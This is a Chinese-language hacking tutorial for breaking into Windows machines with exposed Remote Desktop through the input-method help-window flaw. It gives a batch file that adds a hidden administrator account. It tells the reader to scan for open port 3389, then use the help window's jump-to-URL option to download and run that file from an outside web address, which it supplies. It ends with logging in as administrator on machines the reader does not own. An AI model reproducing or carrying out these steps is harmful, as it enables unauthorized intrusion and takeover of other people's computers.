输入法漏洞已经出现很久了，入侵的方法有很多种，我这里介绍的是我自己认为比较方便的一个，呵呵，成功率也高，闲话少说，请看下面的图文讲解：

一.首先我们用记事本写一个bat文件，（存储的时候文件类型选择“所有文件”，再给它一个名，我这里就命名为kide.bat）,文件内容如下：

net user kide 1234 /add

net user kide /active:yes

net localgroup administrators kide /add

这几句语法的意思：1.建立一个用户名为kide,密码为1234的用户；2.激活kide这个用户；3.把kide这个用户加到管理员组(administrators).

然后把这个BAT文件上传到你的主页空间，并且你要记得文件的路径，如果你没有主页空间，我这里提供一个已经上传了的给你，kide.rar

二.扫描开放3389端口的机器，至于用什么来扫描，工具有好多种，推荐使用代理猎手或者Superscan，好了，扫描到一堆了，但大部分的都没有输入法漏洞了，毕竟现在的网管都不全是白痴。如果你运气好点的也会找到的喔，呵呵，我为了写这篇东西，扫了一下，也真的还有呀!#$@#$$%%%^$$$^^.....

1.

打开你的终端服务客户端，填上你搜索出来的IP，连接上去，看到了终端服务熟悉的界面后，把光标移动到“用户名”处，在你的键盘上用Ctrl+Shift调出终端服务的全拼输入法，注意：全拼输入法的标志一定要出现在终端窗口的左下角！

（图一）

2.再用鼠标右键点输入法上微软的标志，如果见到“帮助”一栏是灰色的就撤，因为没有输入法漏洞了，反之就有很大机会有这个漏洞！我这里的例子就是有输入法漏洞的，

（图二）

3.点“帮助”＝》“输入法入门”，过一会就看到了帮助的窗口，

（图三）

4.再用右键点上方的“选项”，在弹出菜单中选择“跳至URL(J)...”

（图四）

5.在“跳至该URL(J):”处填上刚才你做的bat文件的路径，注意一定是完整的路径，例如我提供的BAT文件的路径http://asp.6to23.com/sandflee/kide.bat

(图五）

6.按“确定”之后，如果你的BAT文件的服务器能够正常下载，一会我们就看到了下载的提示框，我们选择“在当前位置运行该程序”＝》“确定”

（图六）

7.如果没有什么错误提示的话，就表示成功了，好了，关掉这个窗口，重新打开终端服务客户端，填上这个IP，连接上去，在用户名处填上kide,密码就是
1234
啦，呵呵！进去了，想干什么都行了，你已经是管理员的身份登陆了，祝你好运！

三.其实这个方法也不是我发现的，我只是整理一下做个图文教材，自己也觉得这个方法不错，如果你有更好的方法也请你能提供给大家。

更多的关于3389方面的问题请访问:
http://3389.cnxhacker.net/
这是『中国X黑客小组』的一个3389技术专栏,欢迎光临讨论相关技术!